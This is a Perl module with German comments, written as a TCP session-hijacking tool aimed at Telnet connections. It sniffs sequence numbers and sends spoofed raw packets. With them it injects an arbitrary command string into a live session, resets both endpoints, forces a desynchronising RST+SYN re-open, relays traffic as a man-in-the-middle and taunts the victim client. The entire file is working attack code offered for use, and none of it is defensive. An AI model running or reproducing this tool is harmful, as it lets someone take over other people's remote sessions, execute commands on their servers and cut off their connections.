# Connection.pm
# Klasse, die tcp-connections verwaltet
# hier gibt's noch viel zu tun
# 
# Autor: stefan@krecher.de
# TheMidget
#
# Lizenz: GPL

package Connection;

use Net::PcapUtils;
use NetPacket::IP qw(:strip);
use NetPacket::TCP;
use Net::RawIP;

# Konstruktor: erstellt mit den Daten aus $tcp_obj eine neue Connection
sub new {
  my ($class, $ip_obj) = @_;
  my $self = {};
  my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});

  # Hier wird gecheckt, ob es ein Paket vom / zum Server ist
  # z.Zt. wird nur Telnet untersttzt
  if ($tcp_obj->{src_port} == 23) {  # Paket kommt vom Server
    $self->{srv_ip} = $ip_obj->{src_ip};
    $self->{clt_ip} = $ip_obj->{dest_ip};
    $self->{srv_port} = $tcp_obj->{src_port};
    $self->{clt_port} = $tcp_obj->{dest_port};
    $self->{srv_seq_no} = $tcp_obj->{seqnum};
    $self->{srv_ack_no} = $tcp_obj->{acknum};
  } elsif ($tcp_obj->{dest_port} == 23) {  # Paket kommt vom Client
    $self->{srv_ip} = $ip_obj->{dest_ip};
    $self->{clt_ip} = $ip_obj->{src_ip};
    $self->{srv_port} = $tcp_obj->{dest_port};
    $self->{clt_port} = $tcp_obj->{src_port};
    $self->{clt_seq_no} = $tcp_obj->{seqnum};
    $self->{clt_ack_no} = $tcp_obj->{acknum};
  };
  bless($self, $class);
}

# Methode "check": prft, ob ein TCP-Paket zur Connection gehrt
# Wenn FIN/ RST gesetzt sind zerstrt es sich ggf. selbst.
# Rckgabewert: 0 - Pakete gehrt nicht in die Connection
#               1 - Paket gehrt in die Connection
sub check {
  my ($self, $ip_obj) = @_;
  my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});
  $exists = 0;
  if (  # Wenn das Paket vom Server kommt
    ($self->{srv_ip} == $ip_obj->{src_ip}) &&
    ($self->{clt_ip} == $ip_obj->{dest_ip}) &&
    ($self->{srv_port} == $tcp_obj->{src_port}) &&
    ($self->{clt_port} == $tcp_obj->{dest_port})
    ) {
        $exists = 1;
      } 
  elsif (  # Wenn das Paket vom Client kommt
    ($self->{srv_ip} == $ip_obj->{dest_ip}) &&
    ($self->{clt_ip} == $ip_obj->{src_ip}) &&
    ($self->{srv_port} == $tcp_obj->{dest_port}) &&
    ($self->{clt_port} == $tcp_obj->{src_port})
    ) {
        $exists = 1;
      };
  return $exists;
}

# Methode "updateWith($ip_obj)" updated eine Connection
# d.h.: die Sequenznummern werden geupdated.
# Ob das Paket wirklich in die Connection gehrt, mu
# vorher durch check() geprft werden
sub updateWith {
  my ($self, $ip_obj) = @_;
  my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});
  if ($self->{srv_port} == $tcp_obj->{src_port}) { # Das Paket kommt vom Server
    $self->{srv_seq_no} = $tcp_obj->{seqnum};
    $self->{srv_ack_no} = $tcp_obj->{acknum};
  } else {  # Das Paket kommt vom Client
    $self->{clt_seq_no} = $tcp_obj->{seqnum};
    $self->{clt_ack_no} = $tcp_obj->{acknum};
  }
}

# Methode "reactOnServerSyn($ip_obj)" berprft ob das Paket das
# SYN-Flag gesetzt hat (als Reaktion auf RST+SYN), updatet die
# Connection-Informationen (neue Sequenznummern), liefert im
# Erfolgsfalle 1, ansonsten 0 zurck
sub reactOnServerSyn {
  my ($self, $ip_obj) = @_;
  my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});

  # Wenn SYN gesetzt ist und das Paket vom Server kommt
  if (($tcp_obj->{flags} == 18) && ($ip_obj->{src_ip} eq $self->{srv_ip})) {
    # dann mssen die Verbindungsdaten angepasst werden:
    $self->{clt_seq_no} = 1000000001;  # initiale clt_seq_no + 1
    $self->{clt_ack_no} = $tcp_obj->{seqnum} + 1;
    $self->{srv_seq_no} = $tcp_obj->{seqnum};
    $self->{srv_ack_no} = 1000000001;
    # und sofort ein ACK schicken
    my $tcp_pak = new Net::RawIP;
    $tcp_pak->set({
                ip => {
                        saddr => $self->{clt_ip},
                        daddr => $self->{srv_ip}
                      },
                tcp => {
                         source => $self->{clt_port},
                         dest => $self->{srv_port},
                         ack => $self->{clt_ack_no},
                         seq => $self->{srv_ack_no},
                         ack_seq => $self->{clt_ack_no},
                         window =>"2342",
                       }
                });
    $tcp_pak->send(0, 1);
    return 1;
  } else {
    return 0;
  }
}

# Methode "forward($ip_obj)" baut $ip_obj empfngerkonform um
sub forward {
  my ($self, $ip_obj) = @_;
  my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});

# Wenn das Paket leer oder von diesem Modul erstellt wurde, droppe es
  if (($tcp_obj->{winsize} == 2342) || (length($tcp_obj->{data})) == 0){
    print "Dropped\n";
    return 1;
  }


  my $src_ip, $dst_ip, $src_port, $dst_port, $seq_nr, $ack_nr, $data;
  if ($self->{srv_port} == $tcp_obj->{src_port}) { # Das Paket kommt vom Server
    $src_ip = $self->{srv_ip};
    $dst_ip = $self->{clt_ip};
    $src_port = $self->{srv_port};
    $dst_port = $self->{clt_port};
    $seq_nr = $self->{clt_ack_no};
    $ack_nr = $self->{srv_ack_no};
    $data = $tcp_obj->{data};
  } else {  # Das Paket kommt vom Client
    $src_ip = $self->{clt_ip};
    $dst_ip = $self->{srv_ip};
    $src_port = $self->{clt_port};
    $dst_port = $self->{srv_port};
    $seq_nr = $self->{srv_ack_no};
    $ack_nr = $self->{clt_ack_no};
    $data = $tcp_obj->{data};
  }
  my $tcp_pak = new Net::RawIP;
  $tcp_pak->set({
              ip => {
                      saddr => $src_ip,
                      daddr => $dst_ip
                    },
              tcp => {
                       source => $src_port,
                       dest => $dst_port,
                       psh => "1",
                       ack => "1",
                       seq => $seq_nr,
                       ack_seq => $ack_nr,
                       window =>"2342",
                       data => $data
                     }
              });
  $tcp_pak->send(0, 1);
  print "Forwarded\n";
}

# Gibt Informationen ueber die Connection als String aus
sub asString {
  my $self = shift;
  my $retString = "";
  $retString = $self->{clt_ip} . ":" . $self->{clt_port}
             . " SN: " . $self->{clt_seq_no} 
             . " AN: " . $self->{clt_ack_no}
             . " <-> " . $self->{srv_ip} . ":" . $self->{srv_port}
             . " SN: " . $self->{srv_seq_no}
             . " AN: " . $self->{srv_ack_no};
  return $retString;
}

# Methode "setIsHijacked()" markiert die Connection als ge-hijacked
sub setIsHijacked {
  my $self = shift;
  $self->{is_hijacked} = 1;
}

# Methode "isHijacked()" liefert "1", wenn die Connection infiltriert wurde
sub isHijacked {
  my $self = shift;
  if ($self->{is_hijacked}) {
    return 1;
  } else {
    return 0;
  }
}

# Methode "setRstSynSent()" - Markierung "Reset-Reopen eingeleitet"
sub setRstSynSent {
  my $self = shift;
  $self->{rst_syn_sent} = 1;
}

# Methode "isRstSynSent()" liefert "1", wenn "Reset-Reopen" eingeleitet wurde
sub isRstSynSent {
  my $self = shift;
  if ($self->{rst_syn_sent}) {
    return 1;
  } else {
    return 0;
  }
}

# Methode "isHijackable()" liefert "1", wenn es eine "clt_ack_no"
# und eine "srv_ack_no" gibt
# (-> Voraussetzung um ein Paket zu konstruieren)
sub isHijackable {
  my $self = shift;
  if ($self->{clt_ack_no} && $self->{srv_ack_no}) {
    return 1
  } else {
    return 0;
  }
}



# Methode "infiltrate($string)" inflitriert die Connection
# mit dem $string
sub infiltrate {
  my ($self, $hackstring) = @_;
  my $tcp_pak = new Net::RawIP;
  $tcp_pak->set({
              ip => {
                      saddr => $self->{clt_ip},
                      daddr => $self->{srv_ip}
                    },
              tcp => {
                       source => $self->{clt_port},
                       dest => $self->{srv_port},
                       psh => "1",
                       ack => "1",
                       seq => $self->{srv_ack_no},
                       ack_seq => $self->{clt_ack_no},
                       data => $hackstring
                     }
              });
  $tcp_pak->send(0, 1);
}



# Methode "noticeClient($string)" informiert den Client darber, da
# er gehackt wurde
sub noticeClient {
  my ($self, $messageString) = @_;
  my $tcp_pak = new Net::RawIP;
  $tcp_pak->set({
              ip => {
                      saddr => $self->{srv_ip},
                      daddr => $self->{clt_ip}
                    },
              tcp => {
                       source => $self->{srv_port},
                       dest => $self->{clt_port},
                       psh => "1",
                       ack => "1",
                       seq => $self->{clt_ack_no},
                       ack_seq => $self->{srv_ack_no},
                       data => $messageString
                     }
              });
  $tcp_pak->send(0, 1);
}



# Methode "resetRST()" beendet die Connection auf beiden Seiten (RST)
sub resetRST {
  my $self = shift;
  my $tcp_pak = new Net::RawIP;
  # Zuerst den RST an Client
  $tcp_pak->set({
              ip => {
                      saddr => $self->{srv_ip},
                      daddr => $self->{clt_ip}
                    },
              tcp => {
                       source => $self->{srv_port},
                       dest => $self->{clt_port},
                       rst => "1",
                       seq => $self->{clt_ack_no},
                     }
              });
  $tcp_pak->send(0, 1);
  # Und RST an den Server
  $tcp_pak->set({
              ip => {
                      saddr => $self->{clt_ip},
                      daddr => $self->{srv_ip}
                    },
              tcp => {
                       source => $self->{clt_port},
                       dest => $self->{srv_port},
                       rst => "1",
                       seq => $self->{srv_ack_no},
                     }
              });
  $tcp_pak->send(0, 1);
}




# Methode "rstSyn()" schickt ein RST, dann ein SYN an den Server
sub rstSyn {
  my $self = shift;
  my $tcp_pak = new Net::RawIP;
  # Zuerst RST ...
  $tcp_pak->set({
              ip => {
                      saddr => $self->{clt_ip},
                      daddr => $self->{srv_ip}
                    },
              tcp => {
                       source => $self->{clt_port},
                       dest => $self->{srv_port},
                       rst => "1",
                       seq => $self->{srv_ack_no},
                     }
              });
  $tcp_pak->send(0, 1);
  # ... Und dann SYN
  $tcp_pak->set({
              ip => {
                      saddr => $self->{clt_ip},
                      daddr => $self->{srv_ip}
                    },
              tcp => {
                       source => $self->{clt_port},
                       dest => $self->{srv_port},
                       rst => "0",
                       syn => "1",
                       seq => "1000000000",  # neue initiale Sequenznummer
                     }
              });
  $tcp_pak->send(0, 1);
}

1;
